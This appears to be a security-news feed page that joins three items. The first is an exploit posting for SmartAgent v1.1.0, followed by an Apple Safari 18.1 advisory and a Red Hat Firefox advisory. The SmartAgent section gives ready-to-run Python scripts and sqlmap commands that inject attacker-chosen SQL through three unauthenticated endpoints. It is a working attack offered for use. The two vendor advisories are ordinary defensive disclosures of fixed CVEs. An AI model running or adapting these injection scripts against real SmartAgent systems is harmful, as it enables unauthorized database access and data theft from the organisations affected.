SmartAgent version 1.1.0 suffers from multiple unauthenticated remote SQL injection vulnerabilities.

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a POST request to the vulnerable script https://smarts-srlcom.com/privateArea/common/tests/interface.php.

The POST request includes the folowing parameters "action=exportNetworkDate&id=1111" and vulnerable parameter is "id".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/privateArea/common/tests/interface.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

postdata = {  
    "action": "exportNetworkDate",  
  "id": "1111" + sqlcommand  
}

response = requests.post(url, data=postdata, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u https://smartagent.[client].com/privateArea/common/tests/interface.php. --data "action=exportNetworkDate&id=1111" -p "id"

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/privateArea/common/qoe/sendPushManually.php?id=123.

The GET request includes the vulnerable parameter "id".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

parameter = {  
  "id": "123" + sqlcommand  
}

response = requests.get(url, data=parameter, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u  https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php?id=123 -p "id"

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/recuperaLog.php?client=1111.

The GET request includes the vulnerable parameter "client".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/recuperaLog.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

parameter = {  
  "client": "1111" + sqlcommand  
}

response = requests.get(url, data=parameter, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u https://smartagent.[client].com/recuperaLog.php?client=1111 -p "client"

SmartAgent 1.1.0 SQL Injection

Apple Security Advisory 10-29-2024-1 - Safari 18.1 addresses an information leakage vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-29-2024-1 Safari 18.1

Safari 18.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121571.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Safari Downloads  
Available for: macOS Ventura and macOS Sonoma  
Impact: An attacker may be able to misuse a trust relationship to  
download malicious content  
Description: This issue was addressed through improved state management.  
CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

Safari Private Browsing  
Available for: macOS Ventura and macOS Sonoma  
Impact: Private browsing may leak some browsing history  
Description: An information leakage was addressed with additional  
validation.  
CVE-2024-44229: Lucas Di Tomase

WebKit  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

Additional recognition

Safari Private Browsing  
We would like to acknowledge an anonymous researcher, r00tdaddy for  
their assistance.

Safari Tabs  
We would like to acknowledge Jaydev Ahire for their assistance.

Safari 18.1 may be obtained from the Mac App Store.

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmchbpEACgkQX+5d1TXa  
Ivr5gBAAk50bIQ2NvoHDWo1ss9TLbGh9aa2RAHRPS0HqbBmnolc5tcrB1wKorkaf  
FF6lACO/OOti2KjAX44zfLl+9zHMsEFzDkmrY8VosFkYAaLUOly/xYaCUcQcuhLC  
VZy4Moviip3ImFDvR/EjO8vI/7GAjt3XafvRf1k5+w5xzmCuM8mhzLSfs1s4/lxd  
EThQBB7oA18grjnxJqAh9tBwquUkfmGuY9twsNH5qccv+wgw9gYvCIr0jbtCn2vz  
K5FHY/RDmMOfoLZ3am0JqrWd/7uO3bWHYQzS5H501x2tsLJw6Hwy9u+P2NxvRzXd  
pu6WJ22Adei85x5o34W+K42iannlzpgMnMeT81khVzVTY1HKPBikZ1wS13kZ9UyY  
j9dnW0NReyKhDYzFPiTehgC2mErmFWzLtRzxzs/Af7iVadAXw+6evBtP5FIzEqFX  
FfbhS+0icaU3FGklxcD+5++T+OKvo5hDAVjp7lGbBv5C2WvlpuNfmdIXkqYbzpdv  
mIujHNTWNYArlIkXr7vUVOHdB//BtfbIGZdjddYpZbx7q6KxX+z8q+NQ/8ESEUXZ  
KIF0cOAI1P2nVdALfpMaqKVFJa+BfwhWklscDDgPOpVQy0I5cIFJj7MVves534js  
sR+tn4B5jKfe6tmLy1xkgqpTYcdPe/TzW0tc6IRidvYVk3zhpMA=  
=9Fs5  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-29-2024-1

Red Hat Security Advisory 2024-8729-03 - An update for firefox is now available for Red Hat Enterprise Linux 8. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8729.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8729-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8729  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Tag

#web